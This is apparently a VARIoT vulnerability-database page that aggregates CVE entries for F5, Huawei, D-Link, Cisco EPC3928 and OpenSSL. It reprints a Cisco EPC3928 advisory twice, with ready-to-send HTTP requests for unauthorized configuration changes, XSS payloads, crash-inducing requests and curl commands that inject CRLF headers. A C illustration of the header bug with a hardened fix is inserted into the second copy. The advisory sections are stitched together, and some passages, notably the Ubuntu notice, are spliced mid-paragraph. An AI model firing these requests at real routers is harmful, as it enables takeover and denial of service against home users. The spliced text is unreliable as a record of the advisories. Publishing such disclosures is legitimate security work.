VARIoT IoT vulnerabilities database
VAR-201606-0030 | CVE-2016-5020 | F5 BIG-IP vulnerability allowing the account settings of Resource Administrator role users to be changed |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
F5 BIG-IP before 12.0.0 HF3 allows remote authenticated users to modify the account configuration of users with the Resource Administration role and gain privilege via a crafted external Extended Application Verification (EAV) monitor script. Multiple F5 BIG-IP Products are prone to a privilege-escalation vulnerability.
An attacker can exploit this issue to gain elevated privileges and perform unauthorized actions. F5 BIG-IP is a family of products that includes LTM, GTM and WebAccelerator, among others: LTM is a local traffic manager, GTM is a wide area traffic manager, and WebAccelerator is an application accelerator. The following products and versions are affected: LTM, ASM and Link Controller 12.0.0, 11.4.0 to 11.6.1, 11.2.1, and 10.2.1 to 10.2.4; AAM 12.0.0 to 12.1.0 and 11.4.0 to 11.6.1; AFM and PEM 12.0.0 and 11.4.0 to 11.6.1; Analytics 12.0.0, 11.4.0 to 11.6.1, and 11.2.1; DNS 12.0.0; Edge Gateway, WebAccelerator and WOM 11.2.1 and 10.2.1 to 10.2.4; GTM 11.4.0 to 11.6.1, 11.2.1, and 10.2.1 to 10.2.4.
VAR-201606-0459 | CVE-2016-5368 | Huawei AR3200 denial of service (DoS) vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
Memory leak in Huawei AR3200 before V200R007C00SPC900 allows remote attackers to cause a denial of service (memory consumption) via a large number of crafted Multiprotocol Label Switching (MPLS) packets. Huawei AR3200 is an enterprise router series from Huawei. The memory leak occurs in the device's handling of MPLS packets. The Huawei AR3200 router is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause a denial-of-service condition, denying service to legitimate users.
This issue is fixed in Huawei AR3200 router version V200R007C00SPC900. The following versions are affected: Huawei AR3200 V200R007C00, V200R005C32, and V200R005C20.
VAR-201606-0544 | No CVE | D-Link DCS-930L Camera Command Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
D-Link DCS-930L is a wireless surveillance camera from D-Link.
A command injection vulnerability exists in the D-Link DCS-930L camera. An attacker could use this vulnerability to execute arbitrary commands in the context of an affected device.
VAR-201607-0003 | CVE-2016-1328 | Cisco EPC3928 goform/WClientMACList denial of service (DoS) vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
goform/WClientMACList on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long h_sortWireless parameter, related to a "Gateway Client List Denial of Service" issue, aka Bug ID CSCux24948. The Cisco EPC3928 is a wireless router product from Cisco. A security vulnerability exists in goform/WClientMACList on the Cisco EPC3928. Cisco Model EPC3928 Wireless Residential Gateway is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause a denial-of-service condition.
This issue is being tracked by Cisco Bug ID CSCux24948. Variants of this product can also be affected.
Using a combination of several vulnerabilities, an attacker is able to remotely download and decode the boot configuration file, as shown in the PoC video below. The attacker is also able to reconfigure the device in order to perform attacks on the home user, inject additional data into the modem's HTTP responses, or extract sensitive information from the device, such as the Wi-Fi key.
Until Cisco releases workarounds or patches, we recommend verifying access to the web-based management panel and making sure that it is not reachable from the external network.
Vulnerabilities:
1) Unauthorized Command Execution
2) Gateway Stored XSS
3) Gateway Client List DoS
4) Gateway Reflective XSS
5) Gateway HTTP Corruption DoS
6) "Stored" HTTP Response Injection
7) Boot Information Disclosure
========
PoC:
- Unauthorized Command Execution
#1 - Channel selection request:
POST /goform/ChannelsSelection HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/ChannelsSelection.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
SAHappyUpstreamChannel=3
#1 - Response:
HTTP/1.0 200 OK
Server: PS HTTP Server
Content-type: text/html
Connection: close
<html lang="en"><head><title>RELOAD</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script language="javascript" type="text/javascript" src="../active.js"></script><script language="javascript" type="text/javascript" src="../lang.js"></script><script language="javascript" type="text/javascript">var totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);</script></head><body BGCOLOR="#CCCCCC" TEXT=black><form name="formnow"><HR><h1><script language="javascript" type="text/javascript">dw(msg_goform34);</script><a href="http://192.168.1.1/index.asp"><script language="javascript" type="text/javascript">dw(msg_goform35);</script></a><script language="javascript">refreshStatus();</script><input type="text" name="hh" style="background-color:#CCCCCC;font-size:36;border:none"></h1></form></body></html>
#2 - Clear logs request:
POST /goform/Docsis_log HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_log.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
BtnClearLog=Clear+Log&SnmpClearEventLog=0
#2 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Docsis_log.asp
Content-type: text/html
Connection: close
- Gateway Stored and Reflective Cross Site Scripting
Example #1:
#1 - Stored XSS via username change request:
POST /goform/Administration HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
working_mode=0&sysname=<script>alert('XSS')</script>&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Administration.asp
Content-type: text/html
Connection: close
#2 - Redirect request:
GET /Administration.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
DNT: 1
Connection: keep-alive
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 15832
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
<tr>
<td>
<script language="javascript" type="text/javascript">dw(usertype);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</TD>
</tr>
<tr>
(...)
Example #2:
#1 - Reflected XSS via client list request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: 192.168.1.1/WClientMACList.asp
Content-type: text/html
Connection: close
#2 - Redirect request:
GET /WClientMACList.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 7385
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
</table>
</div>
<input type="hidden" name="h_sortWireless" value="mac" onmouseover=alert(1) x="y" />
</form>
</body>
</html>
(...)
- Gateway Client List Denial of Service
The device will crash after the following request is sent.
# HTTP Request
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- Gateway HTTP Corruption Denial of Service
The device will crash after the following request is sent.
# HTTP Request
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_system.asp
Cookie: Lang=en; SessionID=348080
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
- "Stored" HTTP Response Injection
It is possible to inject additional HTTP data into the response, provided the LanguageSelect string parameter is not too long (in that case the device will crash).
The additional data is stored in device memory and returned with every HTTP response on port 80 until reboot.
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 1469
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: w00t
Set-Cookie: SessionID=657670
Content-Length: 1469
- Boot Information Disclosure
In the early boot phase, for a short period of time some administrator functions can be executed, and it is possible to extract the device configuration file. We wrote an exploit that crashes the modem, then retrieves and decodes the config in order to obtain user credentials.
Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo
========
CVE References:
CVE-2015-6401
CVE-2015-6402
CVE-2016-1328
CVE-2016-1336
CVE-2016-1337
Cisco Bug IDs:
CSCux24935
CSCux24938
CSCux24941
CSCux24948
CSCuy28100
CSCux17178
Read more on our blog:
http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/
VAR-201607-0004 | CVE-2016-1336 | Cisco EPC3928 Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a "Gateway HTTP Corruption Denial of Service" issue, aka Bug ID CSCuy28100. The Cisco EPC3928 is a wireless router product from Cisco. A security vulnerability exists in goform/Docsis_system on the Cisco EPC3928. Cisco Wireless Residential Gateway is prone to a denial-of-service vulnerability.
This issue is being tracked by Cisco Bug ID CSCuy28100.
# Title: Cisco EPC 3928 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco Model EPC3928 DOCSIS 3.0 8x4 Wireless Residential Gateway
# CVE References: CVE-2015-6401 / CVE-2015-6402 / CVE-2016-1328 / CVE-2016-1336 / CVE-2016-1337
# Author: Patryk Bogdan from Secorda security team (http://secorda.com/)
========
Summary:
In recent security research, Secorda security team has found multiple vulnerabilities affecting Cisco EPC3928 Wireless Residential Gateway. Variants of this product can also be affected.
VAR-201607-0005 | CVE-2016-1337 | Cisco EPC3928 vulnerability allowing sensitive settings and credentials to be obtained from devices |
CVSS V2: 4.3 CVSS V3: 8.1 Severity: HIGH |
Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a "Boot Information Disclosure" issue, aka Bug ID CSCux17178. The Cisco EPC3928 is a wireless router product from Cisco. A security vulnerability exists in the Cisco EPC3928.
This issue is being tracked by Cisco Bug ID CSCux17178. Variants of this product can also be affected.
Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key.
Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network.
Vulnerabilities:
1) Unauthorized Command Execution
2) Gateway Stored XSS
3) Gateway Client List DoS
4) Gateway Reflective XSS
5) Gateway HTTP Corruption DoS
6) "Stored" HTTP Response Injection
7) Boot Information Disclosure
========
PoC:
- Unathorized Command Execution
#1 - Channel selection request:
POST /goform/ChannelsSelection HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/ChannelsSelection.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
SAHappyUpstreamChannel=3
#1 - Response:
HTTP/1.0 200 OK
Server: PS HTTP Server
Content-type: text/html
Connection: close
<html lang="en"><head><title>RELOAD</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script language="javascript" type="text/javascript" src="../active.js"></script><script language="javascript" type="text/javascript" src="../lang.js"></script><script language="javascript" type="text/javascript">var totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);</script></head><body BGCOLOR="#CCCCCC" TEXT=black><form name="formnow"><HR><h1><script language="javascript" type="text/javascript">dw(msg_goform34);</script><a href="http://192.168.1.1/index.asp"><script language="javascript" type="text/javascript">dw(msg_goform35);</script></a><script language="javascript">refreshStatus();</script><input type="text" name="hh" style="background-color:#CCCCCC;font-size:36;border:n
one"></h1></form></body></html>
#2 - Clear logs request:
POST /goform/Docsis_log HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_log.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
BtnClearLog=Clear+Log&SnmpClearEventLog=0
#2 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Docsis_log.asp
Content-type: text/html
Connection: close
- Gateway Stored and Reflective Cross Site Scripting
Example #1:
#1 \x96 Stored XSS via username change request:
POST /goform/Administration HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
working_mode=0&sysname=<script>alert('XSS')</script>&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common
#1 \x96 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Administration.asp
Content-type: text/html
Connection: close
#2 \x96 Redirect request:
GET /Administration.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
DNT: 1
Connection: keep-alive
#2 \x96 Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 15832
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
<tr>
<td>
<script language="javascript" type="text/javascript">dw(usertype);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</TD>
</tr>
<tr>
(...)
Example #2:
#1 \x96 Reflected XSS via client list request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y
#1 \x96 Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: 192.168.1.1/WClientMACList.asp
Content-type: text/html
Connection: close
#2 \x96 Redirect request:
GET /WClientMACList.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
#2 \x96 Reponse:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 7385
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
</table>
</div>
<input type="hidden" name="h_sortWireless" value="mac" onmouseover=alert(1) x="y" />
</form>
</body>
</html>
(...)
- Gateway Client List Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- Gateway HTTP Corruption Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_system.asp
Cookie: Lang=en; SessionID=348080
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
- "Stored" HTTP Response Injection
It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash).
Additional data will be stored in device memory and returned with every http response on port 80 until reboot.
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 1469
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: w00t
Set-Cookie: SessionID=657670
Content-Length: 1469
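As an added illustration, not part of the original advisory or of the device firmware, the following C code models the header construction the PoC above exploits: a builder that copies the stored language value verbatim into a Set-Cookie header, beside a hardened builder that rejects any value containing CR, LF or other control bytes before it reaches the header. Function names are this example's own, and the payload string is the decoded form of the en%0d%0aSet-Cookie: w00t value used in the curl command.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if v may be placed in an HTTP header field value: no CR, no LF,
 * and no other control bytes (RFC 7230 field-content permits HTAB plus
 * visible characters only). */
int header_value_ok(const char *v)
{
    for (const unsigned char *p = (const unsigned char *)v; *p != '\0'; p++) {
        if (*p == '\r' || *p == '\n')
            return 0;                     /* would terminate the header line */
        if ((*p < 0x20 && *p != '\t') || *p == 0x7f)
            return 0;                     /* other control bytes */
    }
    return 1;
}

/* Vulnerable builder, modelled on the device behaviour: the stored language
 * value is copied verbatim into the Set-Cookie header, so a value containing
 * "\r\n" ends the line early and the remainder becomes a header line the
 * attacker chose. Returns bytes written, or -1 if the output buffer is too small. */
int build_lang_cookie_vulnerable(char *out, size_t outsz, const char *lang)
{
    int n = snprintf(out, outsz, "Set-Cookie: Lang=%s\r\n", lang);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    return n;
}

/* Hardened builder: validates the value before it ever reaches the header. */
int build_lang_cookie_hardened(char *out, size_t outsz, const char *lang)
{
    if (!header_value_ok(lang))
        return -1;
    return build_lang_cookie_vulnerable(out, outsz, lang);
}

/* Number of CRLF-terminated lines in a header fragment: one value should
 * yield exactly one line. */
int count_header_lines(const char *s)
{
    int n = 0;
    for (const char *p = strstr(s, "\r\n"); p != NULL; p = strstr(p + 2, "\r\n"))
        n++;
    return n;
}

/* Lines the vulnerable builder emits for a value, or -1 if it did not fit. */
int vulnerable_line_count(const char *lang)
{
    char buf[512];
    if (build_lang_cookie_vulnerable(buf, sizeof buf, lang) < 0)
        return -1;
    return count_header_lines(buf);
}

/* Lines the hardened builder emits, or -1 if the value was rejected. */
int hardened_line_count(const char *lang)
{
    char buf[512];
    if (build_lang_cookie_hardened(buf, sizeof buf, lang) < 0)
        return -1;
    return count_header_lines(buf);
}

int main(void)
{
    /* Constructed payload: decoded form of en%0d%0aSet-Cookie: w00t from the PoC. */
    const char *payload = "en\r\nSet-Cookie: w00t";
    char buf[512];

    if (build_lang_cookie_vulnerable(buf, sizeof buf, payload) > 0)
        printf("vulnerable builder produced %d header lines:\n%s",
               count_header_lines(buf), buf);
    if (build_lang_cookie_hardened(buf, sizeof buf, payload) < 0)
        puts("hardened builder rejected the value");
    return 0;
}
```

The validation belongs at the point where the value is stored, not only where it is emitted: once the device has persisted the CRLF-bearing string, every response handler that reads it back is affected, which is exactly why the injected header persists until reboot.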
- Boot Information Disclosure
During the early boot phase, for a short period of time some administrator functions can be executed, and it is possible to extract the device configuration file. We wrote an exploit that crashes the modem, then retrieves and decodes the config in order to obtain user credentials.
Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo
========
CVE References:
CVE-2015-6401
CVE-2015-6402
CVE-2016-1328
CVE-2016-1336
CVE-2016-1337
Cisco Bug IDs:
CSCux24935
CSCux24938
CSCux24941
CSCux24948
CSCuy28100
CSCux17178
Read more on our blog:
http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/
VAR-201606-0477 | CVE-2016-2178 | OpenSSL of crypto/dsa/dsa_ossl.c of dsa_sign_setup In function DSA Vulnerability to obtain a private key |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
The dsa_sign_setup function in crypto/dsa/dsa_ossl.c in OpenSSL through 1.0.2h does not properly ensure the use of constant-time operations, which makes it easier for local users to discover a DSA private key via a timing side-channel attack. OpenSSL is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information. This may aid in further attacks.
Summary:
An update is now available for JBoss Core Services on RHEL 7.
Of the 14 vulnerabilities described in the OpenSSL Security Advisory of September 22, 2016, the OpenSSL Software Foundation classifies one as "High Severity," one as "Moderate Severity," and the other 12 as "Low Severity."
Subsequently, on September 26, the OpenSSL Software Foundation released an additional advisory that describes two new vulnerabilities. These vulnerabilities affect the OpenSSL versions that were released to address the vulnerabilities disclosed in the previous advisory. One of the new vulnerabilities was rated as "Critical Severity" and the other as "Moderate Severity."
Of the 16 released vulnerabilities:
- Fourteen track issues that could result in a denial of service (DoS) condition
- One (CVE-2016-2183, aka SWEET32) tracks an implementation of a birthday attack against Transport Layer Security (TLS) block ciphers that use a 64-bit block size, which could result in loss of confidentiality
- One (CVE-2016-2178) is a timing side-channel attack that, in specific circumstances, could allow an attacker to derive the private DSA key that belongs to another user or service running on the same system
Five of the 16 vulnerabilities affect exclusively the recently released OpenSSL versions that belong to the 1.1.0 code train, which has not yet been integrated into any Cisco product.
For further information, see the knowledge base article linked to in the References section. The JBoss server process must be restarted for the update to take effect.
Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.
==========================================================================
Ubuntu Security Notice USN-3087-2
September 23, 2016
openssl regression
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL.
Software Description:
- openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
USN-3087-1 fixed vulnerabilities in OpenSSL. The fix for CVE-2016-2182 was
incomplete and caused a regression when parsing certificates. This update
fixes the problem.
We apologize for the inconvenience. This
issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)
Quan Luo discovered that OpenSSL did not properly restrict the lifetime
of queue entries in the DTLS implementation. (CVE-2016-2179)
Shi Lei discovered that OpenSSL incorrectly handled memory in the
TS_OBJ_print_bio() function. (CVE-2016-2180)
It was discovered that the OpenSSL incorrectly handled the DTLS anti-replay
feature. (CVE-2016-2181)
Shi Lei discovered that OpenSSL incorrectly validated division results.
(CVE-2016-2182)
Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES
ciphers were vulnerable to birthday attacks. This update moves DES from the HIGH cipher list to MEDIUM.
(CVE-2016-2183)
Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths.
(CVE-2016-6302)
Shi Lei discovered that OpenSSL incorrectly handled memory in the
MDC2_Update() function. (CVE-2016-6303)
Shi Lei discovered that OpenSSL incorrectly performed certain message
length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.04 LTS:
libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS:
libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make
all the necessary changes.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 6
Advisory ID: RHSA-2017:0193-01
Product: Red Hat JBoss Core Services
Advisory URL: https://access.redhat.com/errata/RHSA-2017:0193
Issue date: 2017-01-25
